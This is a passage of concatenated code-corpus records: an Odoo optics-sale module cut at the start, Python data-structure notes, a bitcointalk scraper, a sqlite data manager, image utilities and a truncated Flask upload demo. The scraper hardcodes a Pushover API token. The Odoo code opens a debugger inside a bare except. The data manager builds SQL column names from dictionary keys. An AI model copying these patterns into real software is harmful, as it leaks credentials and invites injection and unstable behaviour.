You can not change.'))\n if stored_obj.paid != False:\n #### Create a challan\n picking_obj = self.pool.get('stock.picking')\n partner_obj = self.pool.get('res.partner')\n move_obj = self.pool.get('stock.move')\n for order in self.browse(cr, uid, ids, context=context):\n picking_id = picking_obj.create(cr, uid, {\n 'origin': order.name,\n 'partner_id': False,\n 'date_done': stored_obj.date,\n 'picking_type_id': 13, ## Hard Coded\n # 'company_id': order.company_id.id,\n 'move_type': 'direct',\n 'note': \"\",\n 'invoice_state': 'none',\n }, context=context)\n self.write(cr, uid, [order.id], {'picking_id': picking_id}, context=context)\n location_id = 25 # Source Location from where stock will reduce\n destination_id = 9 ## Customer location\n move_list = []\n ## This is for Fram3\n if order.frame_id:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': order.frame_id.uom_id.id,\n 'product_uos': order.frame_id.uom_id.id,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': order.frame_id.id,\n 'product_uos_qty': abs(order.quantity),\n 'product_uom_qty': abs(order.quantity),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if order.hard_cover is True:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 187, ## 187\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if order.cell_pad is True:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 188, ## 188\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n for opt_line in order.optics_lens_sale_line_id:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 190, ## 190 This is for lense product variant id\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n # 'product_uos_qty': abs(opt_line.qty),\n # 'product_uom_qty': abs(opt_line.qty),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if picking_id:\n picking_obj.action_confirm(cr, uid, [picking_id], context=context)\n picking_obj.force_assign(cr, uid, [picking_id], context=context)\n picking_obj.action_done(cr, uid, [picking_id], context=context)\n cr.execute(\"update optics_sale set delivery_id=%s where id=%s\", (picking_id, ids[0]))\n cr.commit()\n ### Ends Here\n\n ###journal entry start\n if stored_obj:\n line_ids = []\n\n if context is None: context = {}\n if context.get('period_id', False):\n return context.get('period_id')\n periods = self.pool.get('account.period').find(cr, uid, context=context)\n period_id = periods and periods[0] or False\n ar_amount = stored_obj.due\n payment_method=stored_obj.payment_type\n if payment_method.service_charge<=0:\n has_been_paid=stored_obj.paid\n else:\n has_been_paid=stored_obj.to_be_paid\n ar_acc=6099\n account=stored_obj.payment_type.account.id\n service_account=stored_obj.payment_type.service_charge_account.id\n\n\n\n if ar_amount > 0:\n line_ids.append((0, 0, {\n 
'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': ar_acc, ### Accounts Receivable ID\n 'debit': ar_amount,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n if has_been_paid > 0:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': account, ### Cash ID\n 'debit': has_been_paid,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n if context is None:\n context = {}\n\n if stored_obj.total:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'account_id': 6098, ##sepcticle income\n 'credit': stored_obj.total,\n 'date_maturity': False,\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n if stored_obj.service_charge>0:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'account_id': service_account, ##sepcticle income\n 'credit': stored_obj.service_charge,\n 'date_maturity': False,\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n jv_entry = self.pool.get('account.move')\n\n j_vals = {'name': '/',\n 'journal_id': 2, ## Sales Journal\n 'date': fields.date.today(),\n 'period_id': period_id,\n 'ref': stored_obj.name,\n 'line_id': line_ids\n }\n\n saved_jv_id = jv_entry.create(cr, uid, j_vals, context=context)\n if saved_jv_id > 0:\n journal_id = saved_jv_id\n try:\n jv_entry.button_validate(cr,uid, [saved_jv_id], context)\n cr.execute(\"update optics_sale set state='confirmed' where id=%s\", (ids))\n cr.commit()\n for bills_vals in stored_obj:\n mr_value = {\n 'date': stored_obj.date,\n 'optics_sale_id': int(stored),\n 'amount': stored_obj.paid,\n 'type': stored_obj.type,\n 'p_type': 'advance',\n 'bill_total_amount': stored_obj.total,\n 'due_amount': stored_obj.due,\n }\n mr_obj = self.pool.get('leih.money.receipt')\n mr_id = mr_obj.create(cr, uid, mr_value, context=context)\n if mr_id is not None:\n mr_name = 'MR#' + str(mr_id)\n cr.execute('update leih_money_receipt set name=%s where id=%s', (mr_name, mr_id))\n cr.commit()\n except:\n import pdb\n pdb.set_trace()\n\n ###end journal entry\n\n\n else:\n raise osv.except_osv(_('Warning!'),\n _('Minimum Payment is Required'))\n #journal for cogs\n stock_picking_obj = self.pool['stock.picking'].browse(cr, uid, [picking_id],context=context)[0]\n if len(stock_picking_obj)>0:\n lines_ids = []\n\n for items in stock_picking_obj.move_lines:\n inv_value = 0\n for q_it in items.quant_ids:\n inv_value = inv_value + abs(q_it.inventory_value)\n break\n # import pdb\n # pdb.set_trace()\n\n lines_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': order.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': items.product_id.categ_id.property_account_expense_categ.id, ### Cash ID\n 'debit': abs(inv_value),\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n lines_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': order.name,\n 'currency_id': False,\n 'credit': abs(inv_value),\n 'date_maturity': False,\n 'account_id': items.product_id.categ_id.property_stock_account_output_categ.id,\n ### 
Accounts Receivable ID\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n\n jvv_entry = self.pool.get('account.move')\n\n\n nj_vals = {'name': '/',\n 'journal_id': 2, ## Sales Journal\n 'date': fields.date.today(),\n 'period_id': period_id,\n 'ref': order.name,\n 'line_id': lines_ids\n\n }\n\n saved_jv_ids = jvv_entry.create(cr, uid, nj_vals, context=context)\n\n\n return self.pool['report'].get_action(cr, uid, ids, 'leih.report_optics_sale', context=context)\n\n def onchange_patient(self, cr, uid, ids, name, context=None):\n tests = {}\n dep_object = self.pool.get('patient.info').browse(cr, uid, name, context=None)\n abc = {'mobile': dep_object.mobile, 'address': dep_object.address, 'age': dep_object.age, 'sex': dep_object.sex}\n tests['value'] = abc\n return tests\n\n def bill_cancel(self, cr, uid, ids, context=None):\n ## Bill Status Will Change\n cr.execute(\"update optics_sale set state='cancelled' where id=%s\", (ids))\n cr.commit()\n return True\n\n def btn_pay_bill(self, cr, uid, ids, context=None):\n if not ids: return []\n inv = self.browse(cr, uid, ids[0], context=context)\n if inv.state == 'pending':\n raise osv.except_osv(_('Warning'), _('Please Confirm and Print the Optics Form'))\n if inv.total == inv.paid:\n raise osv.except_osv(_('Full Paid'), _('Nothing to Pay Here. Already Full Paid'))\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'leih',\n 'optics_sale_payment_form_view')\n #\n # total=inv.total\n\n return {\n 'name': _(\"Pay Invoice\"),\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'optics.sale.payment',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': {\n 'default_optics_sale_id': ids[0],\n 'default_amount': inv.due\n }\n }\n raise osv.except_osv(_('Error!'), _('There is no default company for the current user!'))\n\n def create(self, cr, uid, vals, context=None):\n f_prod_id = vals.get('frame_id')\n if f_prod_id:\n has_qty = False\n try:\n # f_prod_id = vals.get('frame_id')\n p_obj = self.pool['product.product'].browse(cr, uid, [f_prod_id], context=context)\n if p_obj.qty_available > 0:\n has_qty = True\n except:\n pass\n if has_qty == False:\n raise osv.except_osv(_('Warning!'),\n _('Stock is not available'))\n if context is None:\n context = {}\n stored = super(optics_sale, self).create(cr, uid, vals, context) # return ID int object\n if stored is not None:\n name_text = 'OPT- 0' + str(stored)\n cr.execute('update optics_sale set name=%s where id=%s', (name_text, stored))\n cr.commit()\n return stored\n\n def write(self, cr, uid, ids, vals, context=None):\n return super(optics_sale, self).write(cr, uid, ids, vals, context=context)\n\n @api.onchange('optics_lens_sale_line_id')\n def onchange_lens_bill(self):\n sumalltest = 0\n for item in self.optics_lens_sale_line_id:\n sumalltest = sumalltest + item.total_amount\n self.total = sumalltest + self.price\n self.due = sumalltest - self.paid + self.price\n return \"X\"\n\n @api.onchange('frame_id')\n def onchange_frame_bill(self):\n frame_code=self.frame_id\n self.price=frame_code.list_price\n self.qty_available=frame_code.qty_available\n return 'X'\n # import pdb\n # pdb.set_trace()\n\n\n @api.onchange('paid')\n def onchange_paid(self):\n self.due = self.total - self.paid\n if self.payment_type:\n if self.payment_type.name=='Visa Card':\n interest = self.payment_type.service_charge\n service_charge = (self.paid * interest) / 100\n self.service_charge = service_charge\n 
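The `(0, 0, vals)` triples accumulated in `line_ids` and `lines_ids` above are one2many create commands, and the journal entry they build must balance (total debit equal to total credit) to be valid accounting. A small pre-check helper, hypothetical and not part of the original module, fails fast before the entry reaches `button_validate`:

def assert_balanced(line_ids):
    # line_ids is a list of (0, 0, vals) one2many create commands
    debit = sum(vals.get('debit', 0.0) for _, _, vals in line_ids)
    credit = sum(vals.get('credit', 0.0) for _, _, vals in line_ids)
    assert abs(debit - credit) < 0.005, 'unbalanced entry: %s vs %s' % (debit, credit)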
self.to_be_paid = self.paid + service_charge\n return 'x'\n\n @api.onchange('price')\n def onchange_price(self):\n sumalltest = 0\n for item in self.optics_lens_sale_line_id:\n sumalltest = sumalltest + item.total_amount\n self.total = self.price + sumalltest\n self.due = self.price + sumalltest - self.paid\n return 'x'\n\n # @api.onchange('doctors_discounts')\n # def onchange_doc_discount(self):\n # aft_discount = (self.total * (self.doctors_discounts / 100))\n # self.after_discount = aft_discount\n # self.grand_total = self.total - aft_discount - self.other_discount\n # self.due = self.total - aft_discount - self.other_discount - self.paid\n #\n # return \"X\"\n @api.onchange('other_discount')\n def onchange_other_discount(self):\n self.grand_total = self.total - self.after_discount - self.other_discount\n self.due = self.total - self.after_discount - self.other_discount - self.paid\n return 'True'\n\n\n# class optics_information(osv.osv):\n# _name = 'optics.sale.line'\n#\n# def _amount_all(self, cr, uid, ids, field_name, arg, context=None):\n# cur_obj = self.pool.get('optics.sale')\n# res = {}\n# for record in self.browse(cr, uid, ids, context=context):\n# rate = record.price\n# discount = record.discount\n# interst_amount = int(discount) * int(rate) / 100\n# total_amount = int(rate) - interst_amount\n# res[record.id] = total_amount\n# # import pdb\n# # pdb.set_trace()\n# return res\n#\n# _columns = {\n#\n# 'name': fields.many2one(\"product.product\", \"Item Name\", ondelete='cascade'),\n# 'optics_sale_id': fields.many2one('optics.sale', \"Information\"),\n# 'department': fields.char(\"Department\"),\n# 'delivery_date': fields.date(\"Delivery Date\"),\n# 'date': fields.datetime(\"Date\", readonly=True, default=lambda self: fields.datetime.now()),\n# # 'currency_id': fields.related('pricelist_id', 'currency_id', type=\"many2one\", relation=\"res.currency\",\n# # string=\"Currency\", readonly=True, required=True),\n# # 'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute=dp.get_precision('Account')),\n# 'price': fields.integer(\"Price\"),\n# 'qty': fields.integer(\"Quantity\"),\n# 'total_amount': fields.integer(\"Total Amount\"),\n# 'assign_doctors': fields.many2one('doctors.profile', 'Doctor'),\n# 'commission_paid': fields.boolean(\"Commission Paid\"),\n#\n# }\n# def onchange_test(self, cr, uid, ids, name, context=None):\n# tests = {'values': {}}\n# dep_object = self.pool.get('product.product').browse(cr, uid, name, context=None)\n#\n# abc = {'price': dep_object.list_price, 'total_amount': dep_object.list_price,\n# 'optics_sale_id.paid': dep_object.list_price}\n# tests['value'] = abc\n# # import pdb\n# # pdb.set_trace()\n# return tests\n# def onchange_discount(self, cr, uid, ids, name, discount, context=None):\n# tests = {'values': {}}\n# dep_object = self.pool.get('examination.entry').browse(cr, uid, name, context=None)\n# abc = {'total_amount': round(dep_object.rate - (dep_object.rate * discount / 100))}\n# tests['value'] = abc\n# # import pdb\n# # pdb.set_trace()\n# return tests\n# def create(self, cr, uid, vals, context=None):\n# # deliry_min_time\n# stored = super(optics_information, self).create(cr, uid, vals, context)\n#\n#\n# # today = datetime.datetime.strftime(datetime.datetime.today(), '%d/%m/%Y-%Hh/%Mm')\n#\n# return 0\n# def write(self, cr, uid, vals, context=None):\n# import pdb\n# pdb.set_trace()\n# starting the process of frame\nclass optics_lens_information(osv.osv):\n _name = 'optics.lens.sale.line'\n _columns = {\n 'name': 
fields.many2one(\"product.lens\", \"Lens Name\", ondelete='cascade'),\n 'product_id': fields.many2one('product.product', \"Lens Name\"),\n 'optics_sale_id': fields.many2one('optics.sale', \"Information\"),\n 'price': fields.integer(\"Unit Price\"),\n 'qty': fields.integer(\"Quantity\"),\n 'total_amount': fields.integer(\"Total Amount\"),\n }\n\n def onchange_lens(self, cr, uid, ids, name, context=None):\n tests = {'values': {}}\n return tests\n\n def onchange_price(self, cr, uid, ids, qty, price, context=None):\n tests = {'values': {}}\n total_line = price * qty\n abc = {'qty': qty, 'total_amount': total_line}\n tests['value'] = abc\n return tests\n\n def onchange_qty(self, cr, uid, ids, qty, price, context=None):\n tests = {'values': {}}\n\n total_line = price * qty\n abc = {'qty': qty, 'total_amount': total_line}\n tests['value'] = abc\n #\n\n return tests\n # def onchange_discount(self, cr, uid, ids, name, discount, context=None):\n # tests = {'values': {}}\n # dep_object = self.pool.get('examination.entry').browse(cr, uid, name, context=None)\n # abc = {'total_amount': round(dep_object.rate - (dep_object.rate * discount / 100))}\n # tests['value'] = abc\n # # import pdb\n # # pdb.set_trace()\n # return tests\n # def create(self, cr, uid, vals, context=None):\n # # deliry_min_time\n # stored = super(optics_lens_information, self).create(cr, uid, vals, context)\n # optics_sale_line_object = self.browse(cr, uid, stored, context=context)\n # test_name = optics_sale_line_object.name\n # required_time = test_name.required_time\n # today = date.today()\n # delivery_date = today + timedelta(days=required_time)\n # cr.execute(\"update optics_sale_line set delivery_date=%s where id=%s\", (delivery_date, stored))\n # cr.commit()\n #\n # # today = datetime.datetime.strftime(datetime.datetime.today(), '%d/%m/%Y-%Hh/%Mm')\n #\n # return 0\n # def write(self, cr, uid, vals, context=None):\n # import pdb\n # pdb.set_trace()\n\n\n# end of the process of lance\nclass admission_payment_line(osv.osv):\n _name = 'optics.sale.payment.line'\n _columns = {\n 'optics_sale_payment_line_id': fields.many2one('optics.sale', 'bill register payment'),\n 'date': fields.datetime(\"Date\"),\n 'amount': fields.float('Amount'),\n 'type': fields.char('Type'),\n 'card_no': fields.char('Card Number'),\n 'bank_name': fields.char('Bank Name'),\n 'money_receipt_id': fields.many2one('leih.money.receipt', 'Money Receipt ID'),\n }\n","sub_path":"optics/optics_sale.py","file_name":"optics_sale.py","file_ext":"py","file_size_in_byte":28133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509332392","text":"import heapq\nfrom collections import *\nfrom itertools import groupby\nfrom operator import itemgetter\n\n# 解压序列赋值给多个变量\ndata = ['ACME', 50, 91.1, (2012, 12, 21)]\nname, shares, price, date = data # 按位置进行取值\n_, i_shares, i_price, _ = data # 可以通过占位符来跳过相应的取值\n# 一般很少这样取值,大多数利用下标取值\n\n# 解压可迭代对象赋值给多个变量\nrecord = ('Dave', 'dave@example.com', '773-555-1212', '847-555-1212')\nr_name, email, *phone_numbers = record # 通过*可直接接收剩余的取值\nhead, *_ = record # 通过无限占位符跳过相应值\n\n# 保留最后 N 个元素 // 利用容量固定的队列,如果装满就删除第一个元素再添加\nq = deque(maxlen=3) # 生成固定的队列,不添加3就是无限队列\n\n# 查找最大或最小的 N 个元素\nnums = [1, 8, 2, 23, 7, -4, 18, 23, 42, 37, 2]\nmin(nums), max(nums) # 值分别为-4,42\nheapq.nsmallest(3, nums), heapq.nlargest(3, nums) # 值为[-4, 1, 2],[42, 37, 23]\n\n# 字典排序\nd = OrderedDict() # 内部维持着一个双向链表,所以需要的空间也就是默认字典的两倍\nd['foo'], d['bar'], d['spam'], d['grok'] = 1, 2, 3, 4\n\n# 字典运算\n# 逻辑运算\nprices = {'ACME': 
45.23, 'AAPL': 612.78, 'IBM': 205.55, 'HPQ': 37.20, 'FB': 10.75}\n# sorted(price) // the wrong way to sort here: only the keys would be sorted\nsorted(prices.values())  # temporarily sorts only the values, [10.75, 37.2, 45.23, 205.55, 612.78]\nsorted(prices.keys())  # temporarily sorts only the keys, ['AAPL', 'ACME', 'FB', 'HPQ', 'IBM']\nprices_sorted = sorted(zip(prices.values(), prices.keys()))\n# compares values first, then keys, showing everything: [(10.75, 'FB'), (37.2, 'HPQ'), (45.23, 'ACME'), (205.55, 'IBM'), (612.78, 'AAPL')]\n# math operations\nmin(prices)  # minimum taken over the keys, AAPL\nmin(prices, key=lambda k: prices[k])  # key of the minimum value, FB\nmin(zip(prices.keys(), prices.values()))  # compares keys first, then values: ('AAPL', 612.78)\n\n# finding common ground between two dicts\na, b = {'x': 1, 'y': 2, 'z': 3}, {'w': 10, 'x': 11, 'y': 2}\n# difference\nc = a.keys() - b.keys()  # {'z'}\n# union\nd = dict(a, **b)  # beware the dict constructor quirk: later keys win, {'x': 11, 'y': 2, 'z': 3, 'w': 10}\n# intersection\na.items() & b.items()  # {('y', 2)}; dict difference/union/intersection operate on keys and items only - to operate on values, turn the values into a set first\n\n# most frequent elements in a sequence\nwords = [\n    'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n    'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n    'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n    'my', 'eyes', \"you're\", 'under'\n]\nword_counts = Counter(words)\n# the 3 most frequent words\ntop_three = word_counts.most_common(3)  # [('eyes', 8), ('the', 5), ('look', 4)]\n\n# sorting a list of dicts\nrows = [\n    {'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},\n    {'fname': 'David', 'lname': 'Beazley', 'uid': 1002},\n    {'fname': 'John', 'lname': 'Cleese', 'uid': 1001},\n    {'fname': 'Big', 'lname': 'Jones', 'uid': 1004}\n]\nrows_by_fname = sorted(rows, key=itemgetter('fname'))  # sort by the given key\nmin_by_fname = min(rows, key=itemgetter('uid'))  # take the minimum by the given key\n# objects without native comparison support can still be sorted, as long as you supply a key argument\n\n# grouping records by a field\nnew_rows = [\n    {'address': '5412 N CLARK', 'date': '07/01/2012'},\n    {'address': '5148 N CLARK', 'date': '07/04/2012'},\n    {'address': '5800 E 58TH', 'date': '07/02/2012'},\n    {'address': '2122 N CLARK', 'date': '07/03/2012'},\n    {'address': '5645 N RAVENSWOOD', 'date': '07/02/2012'},\n    {'address': '1060 W ADDISON', 'date': '07/02/2012'},\n    {'address': '4801 N BROADWAY', 'date': '07/01/2012'},\n    {'address': '1039 W GRANVILLE', 'date': '07/04/2012'},\n]\nnum = sorted(new_rows, key=itemgetter('date'))  # must sort first\nfor date, items in groupby(num, key=itemgetter('date')):  # a crucial preparation step: sort the data by the field you group on\n    print(date)\n    for item in items:\n        print(item)\n\n# extracting a subset of a dict\nprices = {'ACME': 45.23, 'AAPL': 612.78, 'IBM': 205.55, 'HPQ': 37.20, 'FB': 10.75}\np1 = {key: value for key, value in prices.items() if value > 200}  # {'AAPL': 612.78, 'IBM': 205.55}, the fastest way\n\n# named tuples\nSubscriber = namedtuple('Subscriber', ['addr', 'joined'])\nsub = Subscriber('jonesy@example.com', '2012-10-19')  # named tuples replace unclear indexing with dot access; note that namedtuple instances are immutable\n\n","sub_path":"数据结构和算法/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"84483754","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport time\nimport MySQLdb\nimport json\nimport configparser\nimport logging\nimport logging.config\nimport os\nimport re\nimport httplib, urllib\nfrom lxml import html\nimport sys\n\n\nsys.path.insert(0, os.path.abspath('..'))\n\nimport core.conf as conf\nimport core.core as core\n\ndirpath=os.path.dirname(os.path.abspath(__file__))\nid_file_path = dirpath + "/id.txt"\n\nPUSHOVER_APP_ID = \"apg2fy55cjiyzdnxfco7rf4njo1kdv\"\n\ndef tick():\n\tcontent = _get_content()\n\t# content = _get_content_from_file()\n\tlastid = 0\n\tif len(content) == 0:\n\t\treturn\n\t\t\n\t
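The `groupby` pattern in the notes above only merges adjacent equal keys, which is why sorting by the grouping field comes first; when the sort is unwanted, a `defaultdict` grouping over the same `new_rows` list yields the same buckets from unsorted input (sketch):

from collections import defaultdict

rows_by_date = defaultdict(list)
for row in new_rows:
    rows_by_date[row['date']].append(row)
for date in sorted(rows_by_date):  # iterate the groups in date order
    print(date, rows_by_date[date])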
with open(id_file_path,'r') as rf:\r\n\t\tlastid = int(rf.read())\r\n\tmaxid = lastid\r\n\r\n\ttree = html.fromstring(content)\r\n\tnodes = tree.xpath('//*[@class=\"windowbg\"]/span/a')\r\n\tfor node in nodes:\r\n\t\turl = node.get(\"href\")\r\n\t\ttext = node.text\r\n\r\n\t\ttid = int(re.match(r'(.*)=(\\d*)', url).group(2))\r\n\t\tif tid > lastid:\r\n\t\t\t_findit(tid, url, text)\r\n\r\n\t\t# update maxid\r\n\t\tif tid > maxid:\r\n\t\t\tmaxid = tid\r\n\r\n\twith open(id_file_path, 'wb+') as wf:\r\n\t\twf.write(str(maxid))\r\n\ndef _findit(tid, url, title):\r\n\tcontent = (\"tid = {0}\\n url = {1}\\n title = \".format(tid, url) + title)\r\n\tcore.pushover(PUSHOVER_APP_ID, content)\r\n\ndef _get_content():\r\n\tpage = requests.get('https://bitcointalk.org/index.php?board=159.0')\r\n\tif page.status_code != 200:\r\n\t\tcore.info(\"req bitcointalk status code : {0}\".format(page.status_code))\r\n\t\treturn \"\"\r\n\treturn page.content\r\n\ndef _get_content_from_file():\r\n\tf = open(\"page.html\",\"rb+\")\r\n\tcontent = f.read()\r\n\tf.close()\r\n\treturn content\r\n\nif __name__ == \"__main__\":\r\n\ttick()\r\n\t# _send_sms(\"url = xxx \\n tid = xxx\\n name=xxx\")\r\n","sub_path":"icomonitor/icomonitor.py","file_name":"icomonitor.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407264536","text":"import sqlite3\n\nclass DataManager():\n    \"\"\" The database will hold four tables:\n    - one for the plans, with three fields: nom->text, id->integer, chambres->text\n    - one for the rooms, with four fields: nom->text, id->integer, etat->text, lits->text\n    - one for the beds, with two fields: id->integer, etat->text\n    - one to keep the ids up to date: plans, chambres, lits\"\"\"\n    def __init__(self):\n        self.conn = sqlite3.connect(\"Data/data.db\")\n        self.conn.row_factory = sqlite3.Row\n        self.c = self.conn.cursor()\n\n    def new_chambre(self, caracs):\n        # caracs is a dictionary containing: {\"nom\": ?, \"etat\": ?, \"lits\": [?]}\n        caracs[\"id\"] = self.determiner_id(\"chambres\")\n        cmd = \"INSERT INTO chambres VALUES (:nom,:id, :etat, :lits)\"\n        self.c.execute(cmd, caracs)\n        self.conn.commit()\n        return caracs[\"id\"]\n\n    def new_plan(self, caracs):\n        # caracs is a dictionary containing: {\"nom\": ?, \"chambres\": [?]}\n        caracs[\"id\"] = self.determiner_id(\"plans\")\n        cmd = \"INSERT INTO plans VALUES (:nom,:id, :chambres)\"\n        self.c.execute(cmd, caracs)\n        self.conn.commit()\n        return caracs[\"id\"]\n\n    def get_chambre(self, id):\n        list_args = [\"nom\", \"id\", \"etat\", \"lits\"]\n        self.c.execute(\"SELECT * FROM chambres WHERE id=:id\", {'id':id})\n        row = self.c.fetchone()\n        if row != None:\n            Data = {}\n            for i in range(len(list_args)):\n                Data[list_args[i]] = row[i]\n            return Data\n        else:\n            return \"NoChambreData\"\n\n    def get_plan(self, id):\n        list_args = [\"nom\", \"id\", \"chambres\"]\n        print(id)\n        self.c.execute(\"SELECT * FROM plans WHERE id=:id\", {'id':id})\n        row = self.c.fetchone()\n        if row != None:\n            Data = {}\n            for i in range(len(list_args)):\n                Data[list_args[i]] = row[i]\n            return Data\n        else:\n            return \"NoPlanData\"\n\n    def edit_chambre(self, id, caracs):\n        cmd = \"UPDATE chambres SET \"\n        k = caracs.keys()\n        j=0\n        for i in k:\n            if j == 0:\n                cmd += f\"{i}=:{i}\"\n            else:\n                cmd += f\", {i}=:{i}\"\n            j+=1\n        cmd += \" WHERE id=:id\"\n        caracs[\"id\"] = int(id)\n        self.c.execute(cmd, caracs)\n        self.conn.commit()\n\n    def determiner_id(self, table):\n        # determines a UNIQUE id for each member of the database\n        data_to_send = {}\n        
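`determiner_id` depends on `conn.row_factory = sqlite3.Row`, which makes fetched rows addressable by column name as well as by index. A self-contained demonstration against an in-memory database with the same `id` table shape the class expects:

import sqlite3

conn = sqlite3.connect(':memory:')
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('CREATE TABLE id (plans INTEGER, chambres INTEGER, lits INTEGER)')
c.execute('INSERT INTO id VALUES (0, 0, 0)')
row = c.execute('SELECT * FROM id').fetchone()
print(row['chambres'], row[1])  # name-based and index-based access both work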
* FROM id\"\n self.c.execute(cmd)\n ids = self.c.fetchone()\n id_disponible = ids[table]\n for key in ids.keys():\n data_to_send[key] = ids[key]\n data_to_send[table]+=1\n cmd = \"UPDATE id SET plans=:plans, chambres=:chambres, lits=:lits\"\n self.c.execute(cmd, data_to_send)\n self.conn.commit()\n return id_disponible\n","sub_path":"Src/VersionFinale/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585513583","text":"import numpy as np\nimport torch\nfrom PIL import Image\n\n#---------------------------------------------------------#\n# 将图像转换成RGB图像,防止灰度图在预测时报错。\n# 代码仅仅支持RGB图像的预测,所有其它类型的图像都会转化成RGB\n#---------------------------------------------------------#\ndef cvtColor(image):\n if len(np.shape(image)) == 3 and np.shape(image)[2] == 3:\n return image \n else:\n image = image.convert('RGB')\n return image \n\n#---------------------------------------------------#\n# 对输入图像进行resize\n#---------------------------------------------------#\ndef resize_image(image, size, letterbox_image):\n iw, ih = image.size\n w, h = size\n if letterbox_image:\n scale = min(w/iw, h/ih)\n nw = int(iw*scale)\n nh = int(ih*scale)\n\n image = image.resize((nw,nh), Image.BICUBIC)\n new_image = Image.new('RGB', size, (128,128,128))\n new_image.paste(image, ((w-nw)//2, (h-nh)//2))\n else:\n new_image = image.resize((w, h), Image.BICUBIC)\n return new_image\n\ndef get_num_classes(annotation_path):\n with open(annotation_path) as f:\n dataset_path = f.readlines()\n\n labels = []\n for path in dataset_path:\n path_split = path.split(\";\")\n labels.append(int(path_split[0]))\n num_classes = np.max(labels) + 1\n return num_classes\n\n#---------------------------------------------------#\n# 获得学习率\n#---------------------------------------------------#\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef preprocess_input(image):\n image /= 255.0 \n return image\n\ndef show_config(**kwargs):\n print('Configurations:')\n print('-' * 70)\n print('|%25s | %40s|' % ('keys', 'values'))\n print('-' * 70)\n for key, value in kwargs.items():\n print('|%25s | %40s|' % (str(key), str(value)))\n print('-' * 70)","sub_path":"cv/face/facenet/pytorch/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619763309","text":"#!/usr/bin/python3\n# @FileName :demo01_ajax.py\n# @Time :2020/6/7 下午12:47\n# @Author :ABC\n# @Description :\nimport os\n\nfrom flask import Flask, render_template, request, send_from_directory\nfrom werkzeug.utils import secure_filename\n\n'''\n限制文件上传的大小\n'''\napp = Flask(__name__)\napp.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 # 通过设置配置项中的`MAX_CONTENT_LENGTH`参数限制上传文件的大小为1M,也就是1024*1024\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'GET':\n return render_template('index.html')\n elif request.method == 'POST':\n print('request.json:', request.json)\n return 'success!'\n\n\ndef allowed(filename):\n '''\n 限制上传文件的类型\n '''\n support_file_extension_list = ['png', 'jpg', 'html', 'txt']\n file_extension = filename.split('.')[-1]\n if file_extension in support_file_extension_list:\n return True\n return 